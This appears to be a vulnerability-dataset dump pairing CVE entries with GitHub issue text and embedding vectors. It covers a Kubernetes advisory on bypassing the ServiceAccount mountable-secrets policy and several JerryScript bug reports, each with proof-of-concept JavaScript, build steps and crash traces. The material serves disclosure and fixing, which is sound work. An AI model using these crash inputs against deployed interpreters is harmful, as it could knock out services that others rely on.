https://api.github.com/repos/kubernetes/kubernetes/issues/124336/comments
1
2024-04-16T14:04:09Z
2024-04-18T19:04:58Z
https://github.com/kubernetes/kubernetes/issues/124336
2,246,153,626
124,336
[ -0.010574561543762684, -0.03558867797255516, -0.0009968254016712308, -0.005776520352810621, 0.027411388233304024, -0.009386408142745495, -0.014537401497364044, 0.02907480299472809, 0.0032254857942461967, 0.013698704540729523, -0.0015009167836979032, -0.0021998302545398474, 0.0234136022627353...
1,132
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : CVE-2024-3177: Bypassing mountable secrets policy imposed by the ServiceAccount admission plugin Issue date: --- start body --- CVSS Rating: [CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N) - **Low** (2.7) A security issue was discovered in Kubernetes where users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using containers, init containers, and ephemeral containers with the envFrom field populated. The policy ensures pods running with a service account may only reference secrets specified in the service account’s secrets field. Kubernetes clusters are only affected if the ServiceAccount admission plugin and the `kubernetes.io/enforce-mountable-secrets` annotation are used together with containers, init containers, and ephemeral containers with the envFrom field populated. ### Am I vulnerable? The ServiceAccount admission plugin is used. Most cluster should have this on by default as recommended in https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#serviceaccount The kubernetes.io/enforce-mountable-secrets annotation is used by a service account. This annotation is not added by default. Pods using containers, init containers, and ephemeral containers with the envFrom field populated. #### Affected Versions kube-apiserver v1.29.0 - v1.29.3 kube-apiserver v1.28.0 - v1.28.8 kube-apiserver <= v1.27.12 ### How do I mitigate this vulnerability? This issue can be mitigated by applying the patch provided for the kube-apiserver component. The patch prevents containers, init containers, and ephemeral containers with the envFrom field populated from bypassing the mountable secrets policy enforced by the ServiceAccount admission plugin. Outside of applying the provided patch, there are no known mitigations to this vulnerability. #### Fixed Versions - kube-apiserver master - fixed by #124322 - kube-apiserver v1.29.4 - fixed by #124325 - kube-apiserver v1.28.9 - fixed by #124326 - kube-apiserver v1.27.13 - fixed by #124327 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/ ### Detection Pod update requests using a container, init container, or ephemeral container with the envFrom field populated that exploits this vulnerability with unintended secret will be captured in API audit logs. You can also use the following kubectl command to find active pods using the `kubernetes.io/enforce-mountable-secrets` annotation. `kubectl get serviceaccounts --all-namespaces -o jsonpath="{range .items[?(@.metadata.annotations['kubernetes\.io/enforce-mountable-secrets']=='true')]}{.metadata.namespace}{'\t'}{.metadata.name}{'\n'}{end}"` If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Acknowledgements This vulnerability was reported by tha3e1vl. The issue was fixed and coordinated by the fix team: Rita Zhang @ritazh Joel Smith @joelsmith Mo Khan @enj and release managers: Sascha Grunert @saschagrunert Jeremy Rickard @jeremyrickard /triage accepted /lifecycle frozen /area security /kind bug /committee security-response --- end body --- comments : --- start comments --- --- end comments ---
3,476
CVE-2024-33255
2024-04-26T15:15:49.130
Jerryscript commit cefd391 was discovered to contain an Assertion Failure via ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p) in ecma_free_string_list.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/jerryscript-project/jerryscript/issues/5135" } ]
null
null
[ "jerryscript-project", "jerryscript" ]
Issue
###### JerryScript revision cefd391772529c8a9531d7b3c244d78d38be47c6 ###### Build platform Ubuntu 22.04.3 ###### Build steps ```sh python ./tools/build.py --builddir=xxx --debug --clean --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --stack-limit=20 ``` ###### Test case ```sh //poc1.js class s { constructor ( ) { } [ { [idx1] : { [{ [idx1] : { [idx2] : {}}} = [5.7]] : {}}} = [5.7] ] = class { } } new s ( ) ; ``` ```sh //poc2.js const obj = { a : (o) = 1 }; var a = { a : (o) = 1 } = obj; (class C2 { ["foo"] = 5; ["foo"] = {} + {} })((new (class o { ["foo"] = 5; [{ a : (o) = 1 } = obj] = {} + {} })).foo === 5); print(o === 1); ``` ###### Execution steps ```sh ./xxx/bin/jerry poc.js ``` ###### Output ```sh //poc1.js Unhandled exception: ReferenceError: idx1 is not defined ICE: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at /home/qbtly/Desktop/target/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):75. Error: JERRY_FATAL_FAILED_ASSERTION ``` ```sh //poc2.js Unhandled exception: ReferenceError: Variables declared by let/const must be initial ICE: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at /home/qbtly/Desktop/target/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):75. Error: JERRY_FATAL_FAILED_ASSERTION ```
Assertion ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p) in ecma_free_string_list
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5135/comments
0
2024-03-26T09:16:48Z
2024-04-02T14:50:04Z
https://github.com/jerryscript-project/jerryscript/issues/5135
2,207,672,144
5,135
[ 0.007730433251708746, 0.010248346254229546, -0.005326636601239443, 0.015372518450021744, 0.012309795245528221, 0.004262781701982021, 0.011868055909872055, 0.025974256917834282, -0.03734167292714119, 0.0033480138517916203, -0.00859918724745512, 0.020275821909308434, 0.022028053179383278, 0....
1,133
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Assertion ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p) in ecma_free_string_list Issue date: --- start body --- ###### JerryScript revision cefd391772529c8a9531d7b3c244d78d38be47c6 ###### Build platform Ubuntu 22.04.3 ###### Build steps ```sh python ./tools/build.py --builddir=xxx --debug --clean --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --stack-limit=20 ``` ###### Test case ```sh //poc1.js class s { constructor ( ) { } [ { [idx1] : { [{ [idx1] : { [idx2] : {}}} = [5.7]] : {}}} = [5.7] ] = class { } } new s ( ) ; ``` ```sh //poc2.js const obj = { a : (o) = 1 }; var a = { a : (o) = 1 } = obj; (class C2 { ["foo"] = 5; ["foo"] = {} + {} })((new (class o { ["foo"] = 5; [{ a : (o) = 1 } = obj] = {} + {} })).foo === 5); print(o === 1); ``` ###### Execution steps ```sh ./xxx/bin/jerry poc.js ``` ###### Output ```sh //poc1.js Unhandled exception: ReferenceError: idx1 is not defined ICE: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at /home/qbtly/Desktop/target/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):75. Error: JERRY_FATAL_FAILED_ASSERTION ``` ```sh //poc2.js Unhandled exception: ReferenceError: Variables declared by let/const must be initial ICE: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at /home/qbtly/Desktop/target/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):75. Error: JERRY_FATAL_FAILED_ASSERTION ``` --- end body --- comments : --- start comments --- --- end comments ---
1,710
CVE-2024-33258
2024-04-26T15:15:49.180
Jerryscript commit ff9ff8f was discovered to contain a segmentation violation via the component vm_loop at jerry-core/vm/vm.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/jerryscript-project/jerryscript/issues/5114" } ]
null
null
[ "jerryscript-project", "jerryscript" ]
Issue
###### JerryScript revision ff9ff8f36c967890b5ebb240d9fa90d6e351aa01 ###### Build platform Ubuntu 22.04.3 ###### Build steps ```sh python ./tools/build.py --builddir=xxx --clean --debug --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --stack-limit=20 ``` ###### Test case ```sh function JSEtest() { var a; for (a[a = class b { }] = [ this ]; ;) break; } with (JSEtest) { for ( const a = 0; a < 130; a++) { try { while (a < 3) { var c = class extends constructor { static { } ; } ; } } catch (err) { } } } ``` ###### Execution steps ```sh ./xxx/bin/jerry poc.js ``` ###### Output(Debug) ```sh ICE: Assertion 'block_found' failed at /jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_try_statement_end):1922. Error: JERRY_FATAL_FAILED_ASSERTION Aborted ``` ###### Backtrace ```sh Program received signal SIGABRT, Aborted. __pthread_kill_implementation (no_tid=0, signo=6, threadid=140737350406336) at ./nptl/pthread_kill.c:44 44 ./nptl/pthread_kill.c: No such file or directory. (gdb) bt #0 __pthread_kill_implementation (no_tid=0, signo=6, threadid=140737350406336) at ./nptl/pthread_kill.c:44 #1 __pthread_kill_internal (signo=6, threadid=140737350406336) at ./nptl/pthread_kill.c:78 #2 __GI___pthread_kill (threadid=140737350406336, signo=signo@entry=6) at ./nptl/pthread_kill.c:89 #3 0x00007ffff7cb4476 in __GI_raise (sig=sig@entry=6) at ../sysdeps/posix/raise.c:26 #4 0x00007ffff7c9a7f3 in __GI_abort () at ./stdlib/abort.c:79 #5 0x00005555558742f5 in jerry_port_fatal (code=code@entry=JERRY_FATAL_FAILED_ASSERTION) at /jerryscript/jerry-port/common/jerry-port-process.c:29 #6 0x00005555557623b8 in jerry_fatal (code=code@entry=JERRY_FATAL_FAILED_ASSERTION) at /jerryscript/jerry-core/jrt/jrt-fatals.c:63 #7 0x000055555576226c in jerry_assert_fail (assertion=<optimized out>, file=<optimized out>, function=<optimized out>, line=line@entry=1922) at /jerryscript/jerry-core/jrt/jrt-fatals.c:83 #8 0x000055555586106c in parser_parse_try_statement_end (context_p=0x7fffffffdd20) at /jerryscript/jerry-core/parser/js/js-parser-statm.c:1922 #9 parser_parse_statements (context_p=0x7fffffffdd20) at /jerryscript/jerry-core/parser/js/js-parser-statm.c:3132 #10 0x000055555577c016 in parser_parse_source (source_p=source_p@entry=0x7ffff5e00aa0, parse_opts=parse_opts@entry=0, options_p=options_p@entry=0x7ffff5f00830) at /jerryscript/jerry-core/parser/js/js-parser.c:2280 #11 0x000055555577a391 in parser_parse_script (source_p=0x3ad128, source_p@entry=0x7ffff5e00aa0, parse_opts=3854632, parse_opts@entry=0, options_p=0x6, options_p@entry=0x7ffff5f00830) at /jerryscript/jerry-core/parser/js/js-parser.c:3326 #12 0x000055555568d3ca in jerry_parse_common (source_p=0x7ffff5e00aa0, options_p=options_p@entry=0x7ffff5f00830, parse_opts=parse_opts@entry=0) at /jerryscript/jerry-core/api/jerryscript.c:412 #13 0x000055555568d22c in jerry_parse (source_p=<optimized out>, source_size=<optimized out>, options_p=<optimized out>) at /jerryscript/jerry-core/api/jerryscript.c:480 #14 0x0000555555872962 in jerryx_source_parse_script (path_p=<optimized out>) at /jerryscript/jerry-ext/util/sources.c:52 #15 0x0000555555872b54 in jerryx_source_exec_script (path_p=0x3ad128 <error: Cannot access memory at address 0x3ad128>) at /jerryscript/jerry-ext/util/sources.c:63 #16 0x00005555556860bc in main (argc=<optimized out>, argv=<optimized out>) at /jerryscript/jerry-main/main-desktop.c:156 ``` ###### Output(Release) ```sh Program received signal SIGSEGV, Segmentation fault. AddressSanitizer:DEADLYSIGNAL ================================================================= ==3586260==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x55eb8a697df2 bp 0x7ffc5c8bad00 sp 0x7ffc5c8bab00 T0) ==3586260==The signal is caused by a WRITE memory access. ==3586260==Hint: address points to the zero page. #0 0x55eb8a697df2 in vm_loop /jerryscript/jerry-core/vm/vm.c:1648:55 #1 0x55eb8a68d287 in vm_execute /jerryscript/jerry-core/vm/vm.c:5211:37 #2 0x55eb8a68c1a1 in vm_run /jerryscript/jerry-core/vm/vm.c:5312:10 #3 0x55eb8a68bec8 in vm_run_global /jerryscript/jerry-core/vm/vm.c:286:25 #4 0x55eb8a5ba4c6 in jerry_run /jerryscript/jerry-core/api/jerryscript.c:554:24 #5 0x55eb8a71f984 in jerryx_source_exec_script /jerryscript/jerry-ext/util/sources.c:68:14 #6 0x55eb8a5b55b2 in main /jerryscript/jerry-main/main-desktop.c:156:20 #7 0x7f9cc50f9d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #8 0x7f9cc50f9e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #9 0x55eb8a4f5424 in _start (/jerryscript/0323re/bin/jerry+0x41424) (BuildId: efa40b4121fb9ed9276f89fc661eef85c730ab65) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /jerryscript/jerry-core/vm/vm.c:1648:55 in vm_loop ==3586260==ABORTING ```
SEGV /jerryscript/jerry-core/vm/vm.c:1648:55 in vm_loop
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5114/comments
0
2023-11-23T03:57:03Z
2024-06-18T18:02:50Z
https://github.com/jerryscript-project/jerryscript/issues/5114
2,007,446,629
5,114
[ -0.010278626345098019, -0.00975320115685463, -0.0055374871008098125, 0.010680905543267727, 0.0256308875977993, -0.010549549013376236, -0.01477757841348648, 0.043281883001327515, -0.02671457827091217, 0.037436529994010925, -0.0020042089745402336, 0.02280672825872898, 0.03714098036289215, -0...
1,134
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : SEGV /jerryscript/jerry-core/vm/vm.c:1648:55 in vm_loop Issue date: --- start body --- ###### JerryScript revision ff9ff8f36c967890b5ebb240d9fa90d6e351aa01 ###### Build platform Ubuntu 22.04.3 ###### Build steps ```sh python ./tools/build.py --builddir=xxx --clean --debug --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --stack-limit=20 ``` ###### Test case ```sh function JSEtest() { var a; for (a[a = class b { }] = [ this ]; ;) break; } with (JSEtest) { for ( const a = 0; a < 130; a++) { try { while (a < 3) { var c = class extends constructor { static { } ; } ; } } catch (err) { } } } ``` ###### Execution steps ```sh ./xxx/bin/jerry poc.js ``` ###### Output(Debug) ```sh ICE: Assertion 'block_found' failed at /jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_try_statement_end):1922. Error: JERRY_FATAL_FAILED_ASSERTION Aborted ``` ###### Backtrace ```sh Program received signal SIGABRT, Aborted. __pthread_kill_implementation (no_tid=0, signo=6, threadid=140737350406336) at ./nptl/pthread_kill.c:44 44 ./nptl/pthread_kill.c: No such file or directory. (gdb) bt #0 __pthread_kill_implementation (no_tid=0, signo=6, threadid=140737350406336) at ./nptl/pthread_kill.c:44 #1 __pthread_kill_internal (signo=6, threadid=140737350406336) at ./nptl/pthread_kill.c:78 #2 __GI___pthread_kill (threadid=140737350406336, signo=signo@entry=6) at ./nptl/pthread_kill.c:89 #3 0x00007ffff7cb4476 in __GI_raise (sig=sig@entry=6) at ../sysdeps/posix/raise.c:26 #4 0x00007ffff7c9a7f3 in __GI_abort () at ./stdlib/abort.c:79 #5 0x00005555558742f5 in jerry_port_fatal (code=code@entry=JERRY_FATAL_FAILED_ASSERTION) at /jerryscript/jerry-port/common/jerry-port-process.c:29 #6 0x00005555557623b8 in jerry_fatal (code=code@entry=JERRY_FATAL_FAILED_ASSERTION) at /jerryscript/jerry-core/jrt/jrt-fatals.c:63 #7 0x000055555576226c in jerry_assert_fail (assertion=<optimized out>, file=<optimized out>, function=<optimized out>, line=line@entry=1922) at /jerryscript/jerry-core/jrt/jrt-fatals.c:83 #8 0x000055555586106c in parser_parse_try_statement_end (context_p=0x7fffffffdd20) at /jerryscript/jerry-core/parser/js/js-parser-statm.c:1922 #9 parser_parse_statements (context_p=0x7fffffffdd20) at /jerryscript/jerry-core/parser/js/js-parser-statm.c:3132 #10 0x000055555577c016 in parser_parse_source (source_p=source_p@entry=0x7ffff5e00aa0, parse_opts=parse_opts@entry=0, options_p=options_p@entry=0x7ffff5f00830) at /jerryscript/jerry-core/parser/js/js-parser.c:2280 #11 0x000055555577a391 in parser_parse_script (source_p=0x3ad128, source_p@entry=0x7ffff5e00aa0, parse_opts=3854632, parse_opts@entry=0, options_p=0x6, options_p@entry=0x7ffff5f00830) at /jerryscript/jerry-core/parser/js/js-parser.c:3326 #12 0x000055555568d3ca in jerry_parse_common (source_p=0x7ffff5e00aa0, options_p=options_p@entry=0x7ffff5f00830, parse_opts=parse_opts@entry=0) at /jerryscript/jerry-core/api/jerryscript.c:412 #13 0x000055555568d22c in jerry_parse (source_p=<optimized out>, source_size=<optimized out>, options_p=<optimized out>) at /jerryscript/jerry-core/api/jerryscript.c:480 #14 0x0000555555872962 in jerryx_source_parse_script (path_p=<optimized out>) at /jerryscript/jerry-ext/util/sources.c:52 #15 0x0000555555872b54 in jerryx_source_exec_script (path_p=0x3ad128 <error: Cannot access memory at address 0x3ad128>) at /jerryscript/jerry-ext/util/sources.c:63 #16 0x00005555556860bc in main (argc=<optimized out>, argv=<optimized out>) at /jerryscript/jerry-main/main-desktop.c:156 ``` ###### Output(Release) ```sh Program received signal SIGSEGV, Segmentation fault. AddressSanitizer:DEADLYSIGNAL ================================================================= ==3586260==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x55eb8a697df2 bp 0x7ffc5c8bad00 sp 0x7ffc5c8bab00 T0) ==3586260==The signal is caused by a WRITE memory access. ==3586260==Hint: address points to the zero page. #0 0x55eb8a697df2 in vm_loop /jerryscript/jerry-core/vm/vm.c:1648:55 #1 0x55eb8a68d287 in vm_execute /jerryscript/jerry-core/vm/vm.c:5211:37 #2 0x55eb8a68c1a1 in vm_run /jerryscript/jerry-core/vm/vm.c:5312:10 #3 0x55eb8a68bec8 in vm_run_global /jerryscript/jerry-core/vm/vm.c:286:25 #4 0x55eb8a5ba4c6 in jerry_run /jerryscript/jerry-core/api/jerryscript.c:554:24 #5 0x55eb8a71f984 in jerryx_source_exec_script /jerryscript/jerry-ext/util/sources.c:68:14 #6 0x55eb8a5b55b2 in main /jerryscript/jerry-main/main-desktop.c:156:20 #7 0x7f9cc50f9d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #8 0x7f9cc50f9e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #9 0x55eb8a4f5424 in _start (/jerryscript/0323re/bin/jerry+0x41424) (BuildId: efa40b4121fb9ed9276f89fc661eef85c730ab65) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /jerryscript/jerry-core/vm/vm.c:1648:55 in vm_loop ==3586260==ABORTING ``` --- end body --- comments : --- start comments --- --- end comments ---
5,288
CVE-2024-33259
2024-04-26T15:15:49.250
Jerryscript commit cefd391 was discovered to contain a segmentation violation via the component scanner_seek at jerry-core/parser/js/js-scanner-util.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/jerryscript-project/jerryscript/issues/5132" } ]
null
null
[ "jerryscript-project", "jerryscript" ]
Issue
###### JerryScript revision cefd391772529c8a9531d7b3c244d78d38be47c6 ###### Build platform Ubuntu 22.04.3 ###### Build steps ```sh python ./tools/build.py --builddir=xxx --clean --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --stack-limit=20 ``` ###### Test case ```sh function f(){return} switch (class extends c { static { } ; }) { case 1: break} while (false) {continue} ``` ###### Execution steps ```sh ./xxx/bin/jerry poc.js ``` ###### Output ```sh Release: Program received signal SIGSEGV, Segmentation fault. AddressSanitizer:DEADLYSIGNAL ================================================================= ==1362976==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x55e5d2682005 bp 0x7ffe140aa670 sp 0x7ffe140aa540 T0) ==1362976==The signal is caused by a READ memory access. ==1362976==Hint: address points to the zero page. #0 0x55e5d2682005 in scanner_seek /jerryscript/jerry-core/parser/js/js-scanner-util.c:372:17 #1 0x55e5d273667e in parser_parse_switch_statement_start /jerryscript/jerry-core/parser/js/js-parser-statm.c:1714:5 #2 0x55e5d272d2d1 in parser_parse_statements /jerryscript/jerry-core/parser/js/js-parser-statm.c:2821:9 #3 0x55e5d267fdfd in parser_parse_source /jerryscript/jerry-core/parser/js/js-parser.c:2280:5 #4 0x55e5d267e924 in parser_parse_script /jerryscript/jerry-core/parser/js/js-parser.c:3332:38 #5 0x55e5d25dbf38 in jerry_parse_common /jerryscript/jerry-core/api/jerryscript.c:418:21 #6 0x55e5d25dbd34 in jerry_parse /jerryscript/jerry-core/api/jerryscript.c:486:10 #7 0x55e5d274176f in jerryx_source_parse_script /jerryscript/jerry-ext/util/sources.c:52:26 #8 0x55e5d274192f in jerryx_source_exec_script /jerryscript/jerry-ext/util/sources.c:63:26 #9 0x55e5d25d75b2 in main /jerryscript/jerry-main/main-desktop.c:156:20 #10 0x7f39cdf6ed8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #11 0x7f39cdf6ee3f in __libc_start_main csu/../csu/libc-start.c:392:3 #12 0x55e5d2517424 in _start (/jerryscript/0323re/bin/jerry+0x41424) (BuildId: efa40b4121fb9ed9276f89fc661eef85c730ab65) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /jerryscript/jerry-core/parser/js/js-scanner-util.c:372:17 in scanner_seek ==1362976==ABORTING ``` ```sh Debug: ICE: Assertion 'context_p->next_scanner_info_p->source_p == context_p->source_p && context_p->next_scanner_info_p->type == SCANNER_TYPE_SWITCH' failed at /jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_switch_statement_start):1666. Error: JERRY_FATAL_FAILED_ASSERTION Program received signal SIGABRT, Aborted. __pthread_kill_implementation (no_tid=0, signo=6, threadid=140737350406336) at ./nptl/pthread_kill.c:44 44 ./nptl/pthread_kill.c: No such file or directory. ```
SEGV in scanner_seek /jerryscript/jerry-core/parser/js/js-scanner-util.c:372:17
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5132/comments
0
2024-03-26T07:50:12Z
2024-03-26T08:59:44Z
https://github.com/jerryscript-project/jerryscript/issues/5132
2,207,491,351
5,132
[ 0.008634083904325962, 0.015617967583239079, -0.0004233703075442463, 0.012067089788615704, 0.0076690115965902805, 0.014240344986319542, -0.01482970267534256, 0.036923233419656754, -0.03161901608109474, 0.03783673793077469, -0.02814180962741375, 0.013378409668803215, 0.028244946151971817, 0....
1,135
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : SEGV in scanner_seek /jerryscript/jerry-core/parser/js/js-scanner-util.c:372:17 Issue date: --- start body --- ###### JerryScript revision cefd391772529c8a9531d7b3c244d78d38be47c6 ###### Build platform Ubuntu 22.04.3 ###### Build steps ```sh python ./tools/build.py --builddir=xxx --clean --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --stack-limit=20 ``` ###### Test case ```sh function f(){return} switch (class extends c { static { } ; }) { case 1: break} while (false) {continue} ``` ###### Execution steps ```sh ./xxx/bin/jerry poc.js ``` ###### Output ```sh Release: Program received signal SIGSEGV, Segmentation fault. AddressSanitizer:DEADLYSIGNAL ================================================================= ==1362976==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x55e5d2682005 bp 0x7ffe140aa670 sp 0x7ffe140aa540 T0) ==1362976==The signal is caused by a READ memory access. ==1362976==Hint: address points to the zero page. #0 0x55e5d2682005 in scanner_seek /jerryscript/jerry-core/parser/js/js-scanner-util.c:372:17 #1 0x55e5d273667e in parser_parse_switch_statement_start /jerryscript/jerry-core/parser/js/js-parser-statm.c:1714:5 #2 0x55e5d272d2d1 in parser_parse_statements /jerryscript/jerry-core/parser/js/js-parser-statm.c:2821:9 #3 0x55e5d267fdfd in parser_parse_source /jerryscript/jerry-core/parser/js/js-parser.c:2280:5 #4 0x55e5d267e924 in parser_parse_script /jerryscript/jerry-core/parser/js/js-parser.c:3332:38 #5 0x55e5d25dbf38 in jerry_parse_common /jerryscript/jerry-core/api/jerryscript.c:418:21 #6 0x55e5d25dbd34 in jerry_parse /jerryscript/jerry-core/api/jerryscript.c:486:10 #7 0x55e5d274176f in jerryx_source_parse_script /jerryscript/jerry-ext/util/sources.c:52:26 #8 0x55e5d274192f in jerryx_source_exec_script /jerryscript/jerry-ext/util/sources.c:63:26 #9 0x55e5d25d75b2 in main /jerryscript/jerry-main/main-desktop.c:156:20 #10 0x7f39cdf6ed8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #11 0x7f39cdf6ee3f in __libc_start_main csu/../csu/libc-start.c:392:3 #12 0x55e5d2517424 in _start (/jerryscript/0323re/bin/jerry+0x41424) (BuildId: efa40b4121fb9ed9276f89fc661eef85c730ab65) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /jerryscript/jerry-core/parser/js/js-scanner-util.c:372:17 in scanner_seek ==1362976==ABORTING ``` ```sh Debug: ICE: Assertion 'context_p->next_scanner_info_p->source_p == context_p->source_p && context_p->next_scanner_info_p->type == SCANNER_TYPE_SWITCH' failed at /jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_switch_statement_start):1666. Error: JERRY_FATAL_FAILED_ASSERTION Program received signal SIGABRT, Aborted. __pthread_kill_implementation (no_tid=0, signo=6, threadid=140737350406336) at ./nptl/pthread_kill.c:44 44 ./nptl/pthread_kill.c: No such file or directory. ``` --- end body --- comments : --- start comments --- --- end comments ---
3,212
CVE-2024-33260
2024-04-26T15:15:49.303
Jerryscript commit cefd391 was discovered to contain a segmentation violation via the component parser_parse_class at jerry-core/parser/js/js-parser-expr.c
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/jerryscript-project/jerryscript/issues/5133" } ]
null
null
[ "jerryscript-project", "jerryscript" ]
Issue
###### JerryScript revision cefd391772529c8a9531d7b3c244d78d38be47c6 ###### Build platform Ubuntu 22.04.3 ###### Build steps ```sh python ./tools/build.py --builddir=xxx --clean --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --stack-limit=20 ``` ###### Test case ```sh function f(){return} switch (1) { case class extends c { static { } ; }: break} while (false) {continue} ``` ###### Execution steps ```sh ./xxx/bin/jerry poc.js ``` ###### Output ```sh Program received signal SIGSEGV, Segmentation fault. AddressSanitizer:DEADLYSIGNAL ================================================================= ==1654425==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x5615b924fb62 bp 0x7ffc42a950d0 sp 0x7ffc42a94f40 T0) ==1654425==The signal is caused by a WRITE memory access. ==1654425==Hint: address points to the zero page. #0 0x5615b924fb62 in parser_parse_class /jerryscript/jerry-core/parser/js/js-parser-expr.c:1107:38 #1 0x5615b92536bf in parser_parse_unary_expression /jerryscript/jerry-core/parser/js/js-parser-expr.c:2217:7 #2 0x5615b92536bf in parser_parse_expression /jerryscript/jerry-core/parser/js/js-parser-expr.c:4115:9 #3 0x5615b927125e in parser_parse_case_statement /jerryscript/jerry-core/parser/js/js-parser-statm.c:2031:5 #4 0x5615b927125e in parser_parse_statements /jerryscript/jerry-core/parser/js/js-parser-statm.c:2909:9 #5 0x5615b9193185 in parser_parse_source /jerryscript/jerry-core/parser/js/js-parser.c:2280:5 #6 0x5615b9191500 in parser_parse_script /jerryscript/jerry-core/parser/js/js-parser.c:3332:38 #7 0x5615b90a43c9 in jerry_parse_common /jerryscript/jerry-core/api/jerryscript.c:418:21 #8 0x5615b90a422b in jerry_parse /jerryscript/jerry-core/api/jerryscript.c:486:10 #9 0x5615b9289ad1 in jerryx_source_parse_script /jerryscript/jerry-ext/util/sources.c:52:26 #10 0x5615b9289cc3 in jerryx_source_exec_script /jerryscript/jerry-ext/util/sources.c:63:26 #11 0x5615b909d0bb in main /jerryscript/jerry-main/main-desktop.c:156:20 #12 0x7f9c86e91d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #13 0x7f9c86e91e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #14 0x5615b8fdced4 in _start (/jerryscript/0321/bin/jerry+0x71ed4) (BuildId: 8a43acc73309945f9adb42dcffdcdab746b9ecc5) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /jerryscript/jerry-core/parser/js/js-parser-expr.c:1107:38 in parser_parse_class ==1654425==ABORTING ```
SEGV in parser_parse_class /jerryscript/jerry-core/parser/js/js-parser-expr.c:1107:38
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5133/comments
0
2024-03-26T08:05:18Z
2024-03-26T08:06:55Z
https://github.com/jerryscript-project/jerryscript/issues/5133
2,207,524,504
5,133
[ -0.005236303433775902, 0.01783730834722519, 0.0013753582024946809, 0.014309616759419441, 0.018485402688384056, 0.005339409224689007, -0.0281184334307909, 0.03800186514854431, -0.022182483226060867, 0.046515461057424545, -0.02369961142539978, 0.0069007258862257, 0.027352504432201385, 0.0045...
1,136
